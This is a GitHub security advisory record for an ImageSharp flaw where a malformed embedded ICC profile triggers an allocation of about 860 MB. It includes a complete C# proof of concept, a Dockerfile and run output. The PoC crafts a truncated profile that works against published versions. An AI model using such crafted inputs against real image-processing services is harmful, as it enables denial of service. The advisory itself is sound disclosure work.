{"schema_version":"1.9.0","id":"GHSA-gwg2-r3hj-4w44","published":"2026-10-07T20:24:19Z","modified":"2026-10-07T20:30:06.041639722Z","aliases":["CVE-2026-106114"],"summary":"ImageSharp: ICC CLUT parsing allocates from unvalidated channel and grid dimensions","details":"### Summary\n\nA malformed embedded ICC profile can make ImageSharp allocate memory from attacker-controlled CLUT channel and grid dimensions before verifying that the declared CLUT values are present.\n\nIn published v1 through v3 packages, the public lazy ICC parser allocates approximately 115 MB from the 200-byte test profile before rejecting the truncated tag. In published v4 packages, decoding with ICC conversion enabled requests an 860,934,420-byte managed float array from the same profile.\n\n### Affected package and versions\n\n- Package: `SixLabors.ImageSharp` (NuGet)\n- Affected range: `>= 1.0.0-beta0001, <= 4.1.1`\n- Commit `0815358f9202a78bc7f3b83e19282dc3654b500f` corresponds to release **v4.1.1**.\n\nThe parser defect is present from the first published NuGet prerelease, `1.0.0-beta0001`, through the latest published release, 4.1.1. The automatic `Image.Load` conversion path used by the main PoC exists in `>= 4.0.0, <= 4.1.1`; earlier versions expose the same parser defect through the public `IccProfile.Entries` accessor.\n### Details\n\nThe reproduced profile has an `A2B0` multi-process-elements (`mpet`) tag with a\n`clut` element declaring 15 input channels, 15 output channels, and three grid\npoints per input channel. [`ReadClutF32`](https://github.com/SixLabors/ImageSharp/blob/0815358f9202a78bc7f3b83e19282dc3654b500f/src/ImageSharp/Metadata/Profiles/ICC/DataReader/IccDataReader.Lut.cs#L139-L162)\ncomputes `3^15 * 15` and allocates that many floats before reading any CLUT\nvalues or verifying that the tag has enough remaining data. The supplied\n200-byte profile ends immediately after the CLUT grid descriptor.\n\nIn v4, the path is reached when an application decodes an embedded ICC profile using\n`DecoderOptions.ColorProfileHandling = ColorProfileHandling.Convert`. The\ndefault setting, `Preserve`, does not parse the profile for conversion.\n\nIn v1 through v3, `ReadClutF32` uses a jagged representation. Loading an ICC-bearing JPEG and then accessing `decoded.Metadata.IccProfile.Entries` reaches the public lazy parser. The malformed profile allocates the `3^15`-entry outer array before the missing CLUT values are detected.\n\n### Reproduction environment and result\n\nThe supplied automatic-conversion exploit and control were run against the published NuGet 4.1.1\n`net8.0` DLL in Docker on Debian 12 / Linux arm64 with .NET SDK 8.0.424 and\n.NET runtime 8.0.30. The same conversion fixture was run against published 4.0.0 and 4.1.0 with the same result.\n\nPublished 1.0.0, 2.0.0, 2.1.13, 3.0.0, and 3.1.12 were tested through public JPEG decode followed by `IccProfile.Entries`; each allocated approximately 114.9 MB, skipped the malformed tag, and exited normally. The published `1.0.0-beta0001` public `IccProfile(bytes).Entries` path allocated 114,813,528 bytes before a catchable managed bounds exception.\n\nOne exploit decode increased `GC.GetTotalAllocatedBytes(true)` by approximately\n861.5 million bytes, then returned\n`InvalidIccProfileException: Invalid conversion method`.\nThe reader catches the truncated-tag error and drops that tag. The identical\ninput with `ColorProfileHandling.Preserve` completed successfully with roughly\n0.5 million allocated bytes in the harness.\n\nOne complete exploit run produced:\n\n```text\nmode=exploit profile_bytes=200 requested_float_array=215233605 requested_bytes=860934420\nimagesharp_assembly=/work/bin/Release/net8.0/SixLabors.ImageSharp.dll\nimagesharp_version=4.1.1+0815358f9202a78bc7f3b83e19282dc3654b500f\nobserved_exception=SixLabors.ImageSharp.Metadata.Profiles.Icc.InvalidIccProfileException: Invalid conversion method.\nmanaged_bytes_allocated=861476416\nDocker exit status: 0\n```\n\nThe control from the same image produced:\n\n```text\nmode=control profile_bytes=200 requested_float_array=215233605 requested_bytes=860934420\nimagesharp_assembly=/work/bin/Release/net8.0/SixLabors.ImageSharp.dll\nimagesharp_version=4.1.1+0815358f9202a78bc7f3b83e19282dc3654b500f\ndecoded=1x1 icc_present=True\nmanaged_bytes_allocated=511888\nDocker exit status: 0\n```\n\nThe exact allocation counter includes runtime allocations and varies slightly\nbetween processes; the requested CLUT array itself is 860,934,420 bytes.\n\nNo active exploitation is known.\n\n### Impact\n\nThis report demonstrates a large attacker-controlled transient allocation in\nthe ICC conversion path. It does not demonstrate unhandled process termination:\nallocation failure is caught while parsing the malformed tag, so the impact\nshould be limited to memory pressure / input-validation failure unless a\nreproduction demonstrates a stronger result.\n\n\n### Complete PoC files\n\nProgram.cs:\n\n```csharp\nusing System;\nusing System.Buffers.Binary;\nusing System.IO;\nusing System.Reflection;\nusing SixLabors.ImageSharp;\nusing SixLabors.ImageSharp.Formats;\nusing SixLabors.ImageSharp.Formats.Png;\nusing SixLabors.ImageSharp.Metadata.Profiles.Icc;\nusing SixLabors.ImageSharp.PixelFormats;\n\nstatic class Program\n{\n    private const int RequestedFloats = 215233605; // 3^15 * 15\n    private const int RequestedBytes = RequestedFloats * sizeof(float);\n\n    private static void U32(byte[] bytes, int offset, uint value) => BinaryPrimitives.WriteUInt32BigEndian(bytes.AsSpan(offset, 4), value);\n    private static void U16(byte[] bytes, int offset, ushort value) => BinaryPrimitives.WriteUInt16BigEndian(bytes.AsSpan(offset, 2), value);\n    private static void Ascii(byte[] bytes, int offset, string value) { for (int i = 0; i < value.Length; i++) bytes[offset + i] = (byte)value[i]; }\n\n    // ICC v4 RGB profile containing an A2B0 mpet tag whose CLUT is deliberately\n    // truncated after its grid descriptor. ReadClutF32 still sizes float[] from\n    // the 15 untrusted input/output channels and the grid value of three.\n    private static byte[] BuildTruncatedProfile()\n    {\n        const int tagOffset = 144;\n        const int elementOffset = 168;\n        byte[] profile = new byte[200];\n        U32(profile, 0, (uint)profile.Length);\n        Ascii(profile, 4, \"test\");\n        U32(profile, 8, 0x04000000);\n        U32(profile, 12, 0x6D6E7472); // display device\n        U32(profile, 16, 0x52474220); // RGB\n        U32(profile, 20, 0x58595A20); // XYZ\n        Ascii(profile, 36, \"acsp\");\n        U32(profile, 128, 1);\n        U32(profile, 132, 0x41324230); // A2B0\n        U32(profile, 136, tagOffset);\n        U32(profile, 140, 56);\n        U32(profile, tagOffset, 0x6D706574); // mpet\n        U16(profile, tagOffset + 8, 0);\n        U16(profile, tagOffset + 10, 0);\n        U32(profile, tagOffset + 12, 1);\n        U32(profile, tagOffset + 16, 24); // element offset relative to tag start\n        U32(profile, tagOffset + 20, 32);\n        U32(profile, elementOffset, 0x636C7574); // clut\n        U16(profile, elementOffset + 4, 15);\n        U16(profile, elementOffset + 6, 15);\n        for (int i = 0; i < 15; i++) profile[elementOffset + 8 + i] = 3;\n        return profile;\n    }\n\n    private static byte[] BuildPng(byte[] icc)\n    {\n        using var image = new Image<Rgba32>(1, 1);\n        image.Metadata.IccProfile = new IccProfile(icc);\n        using var output = new MemoryStream();\n        image.Save(output, new PngEncoder());\n        return output.ToArray();\n    }\n\n    public static int Main(string[] args)\n    {\n        string mode = args.Length == 1 ? args[0] : \"exploit\";\n        if (mode is not (\"exploit\" or \"control\")) throw new ArgumentException(\"mode must be exploit or control\");\n        Console.WriteLine($\"mode={mode} profile_bytes=200 requested_float_array={RequestedFloats} requested_bytes={RequestedBytes}\");\n        Console.WriteLine($\"imagesharp_assembly={typeof(Image).Assembly.Location}\");\n        Console.WriteLine($\"imagesharp_version={typeof(Image).Assembly.GetCustomAttribute<AssemblyInformationalVersionAttribute>()?.InformationalVersion}\");\n        long before = GC.GetTotalAllocatedBytes(true);\n        try\n        {\n            byte[] png = BuildPng(BuildTruncatedProfile());\n            var options = new DecoderOptions\n            {\n                ColorProfileHandling = mode == \"exploit\" ? ColorProfileHandling.Convert : ColorProfileHandling.Preserve\n            };\n            using Image decoded = Image.Load(options, png);\n            Console.WriteLine($\"decoded={decoded.Width}x{decoded.Height} icc_present={decoded.Metadata.IccProfile is not null}\");\n        }\n        catch (Exception exception)\n        {\n            Console.WriteLine($\"observed_exception={exception.GetType().FullName}: {exception.Message}\");\n        }\n        Console.WriteLine($\"managed_bytes_allocated={GC.GetTotalAllocatedBytes(true) - before}\");\n        return 0;\n    }\n}\n\n```\n\nProject file:\n\n```xml\n<Project Sdk=\"Microsoft.NET.Sdk\">\n  <PropertyGroup>\n    <OutputType>Exe</OutputType>\n    <TargetFramework>net8.0</TargetFramework>\n    <ImplicitUsings>disable</ImplicitUsings>\n    <Nullable>enable</Nullable>\n  </PropertyGroup>\n  <ItemGroup>\n    <Reference Include=\"SixLabors.ImageSharp\">\n      <HintPath>/root/.nuget/packages/sixlabors.imagesharp/4.1.1/lib/net8.0/SixLabors.ImageSharp.dll</HintPath>\n      <Private>true</Private>\n    </Reference>\n    <Reference Include=\"System.IO.Hashing\">\n      <HintPath>/root/.nuget/packages/system.io.hashing/8.0.0/lib/net8.0/System.IO.Hashing.dll</HintPath>\n      <Private>true</Private>\n    </Reference>\n  </ItemGroup>\n</Project>\n\n```\n\nDockerfile:\n\n```dockerfile\nFROM mcr.microsoft.com/dotnet/sdk:8.0\nWORKDIR /work\nCOPY gwg2.csproj Program.cs ./\n# Restore only to obtain the published package. The repro project then uses a\n# direct DLL reference so ImageSharp's package build target is not invoked.\nRUN printf '%s\\n' '<Project Sdk=\"Microsoft.NET.Sdk\"><PropertyGroup><TargetFramework>net8.0</TargetFramework></PropertyGroup><ItemGroup><PackageReference Include=\"SixLabors.ImageSharp\" Version=\"4.1.1\" /></ItemGroup></Project>' > fetch.csproj \\\n    && dotnet restore fetch.csproj --nologo \\\n    && rm fetch.csproj \\\n    && dotnet build gwg2.csproj -c Release --nologo -v quiet\nENTRYPOINT [\"dotnet\", \"/work/bin/Release/net8.0/gwg2.dll\"]\n\n```\n\nRun:\n\n```sh\ndocker build -t imagesharp-gwg2-poc .\ndocker run --rm imagesharp-gwg2-poc exploit\ndocker run --rm imagesharp-gwg2-poc control\n```","affected":[{"package":{"name":"SixLabors.ImageSharp","ecosystem":"NuGet","purl":"pkg:nuget/SixLabors.ImageSharp"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"1.0.0-beta0001"},{"fixed":"4.1.2"}]}],"versions":["1.0.0","1.0.0-beta0001","1.0.0-beta0002","1.0.0-beta0003","1.0.0-beta0004","1.0.0-beta0005","1.0.0-beta0006","1.0.0-beta0007","1.0.0-rc0001","1.0.0-rc0002","1.0.0-rc0003","1.0.1","1.0.2","1.0.3","1.0.4","2.0.0","2.1.0","2.1.1","2.1.10","2.1.11","2.1.12","2.1.13","2.1.2","2.1.3","2.1.4","2.1.5","2.1.6","2.1.7","2.1.8","2.1.9","3.0.0","3.0.1","3.0.2","3.1.0","3.1.1","3.1.10","3.1.11","3.1.12","3.1.2","3.1.3","3.1.4","3.1.5","3.1.6","3.1.7","3.1.8","3.1.9","4.0.0","4.1.0","4.1.1"],"database_specific":{"last_known_affected_version_range":"<= 4.1.1","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-gwg2-r3hj-4w44/GHSA-gwg2-r3hj-4w44.json"}}],"references":[{"type":"WEB","url":"https://github.com/SixLabors/ImageSharp/security/advisories/GHSA-gwg2-r3hj-4w44"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-106114"},{"type":"WEB","url":"https://github.com/SixLabors/ImageSharp/pull/3187"},{"type":"WEB","url":"https://github.com/SixLabors/ImageSharp/commit/8de892a7623aa8a09ba2333b624c8d2eb98325df"},{"type":"PACKAGE","url":"https://github.com/SixLabors/ImageSharp"},{"type":"WEB","url":"https://github.com/SixLabors/ImageSharp/releases/tag/v4.1.2"}],"database_specific":{"cwe_ids":["CWE-789"],"github_reviewed":true,"github_reviewed_at":"2026-10-07T20:24:19Z","nvd_published_at":"2026-10-06T18:16:53Z","severity":"MODERATE"},"severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}]}